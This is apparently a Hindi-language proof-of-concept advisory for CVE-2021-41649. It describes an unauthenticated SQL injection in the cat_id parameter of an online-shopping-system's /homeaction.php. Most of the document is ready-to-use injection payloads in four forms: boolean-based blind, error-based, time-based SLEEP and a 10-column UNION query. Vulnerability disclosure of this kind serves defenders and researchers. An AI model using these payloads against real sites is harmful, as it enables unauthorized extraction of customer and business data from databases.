
CVE-2021-41649 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो cat_id पैरामीटर के माध्यम से online-shopping-system में अप्रमाणित SQL इंजेक्शन प्रदर्शित करता है, जिसमें बूलियन-आधारित, एरर-आधारित, टाइम-आधारित और UNION क्वेरी पेलोड शामिल हैं।
CVE-2021-41649 ऑनलाइन-शॉपिंग-सिस्टम में SQL इंजेक्शन
ऑनलाइन-शॉपिंग-सिस्टम अप्रमाणित त्रुटि/बूलियन-आधारित ब्लाइंड और त्रुटि-आधारित SQL इंजेक्शन हमलों के लिए संवेदनशील है।
/homeaction.php पेज पर cat_id पैरामीटर उपयोगकर्ता इनपुट को सैनिटाइज़ नहीं करता है, एक हमलावर अंतर्निहित MySQL डेटाबेस से संवेदनशील डेटा निकाल सकता है।
यूआरएल: /homeaction.php
पैरामीटर: cat_id
पैरामीटर: cat_id (POST अनुरोध)
प्रकार: boolean-based blind
शीर्षक: AND boolean-based blind - WHERE या HAVING खंड
पेलोड: cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1
प्रकार: error-based
शीर्षक: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY या GROUP BY खंड (FLOOR)
पेलोड: cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1
प्रकार: time-based blind
शीर्षक: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
पेलोड: cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1
प्रकार: UNION query
शीर्षक: Generic UNION query (NULL) - 10 कॉलम
पेलोड: cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

Jason Colyvas
MOBIUSBINARY
21 सितंबर, 2021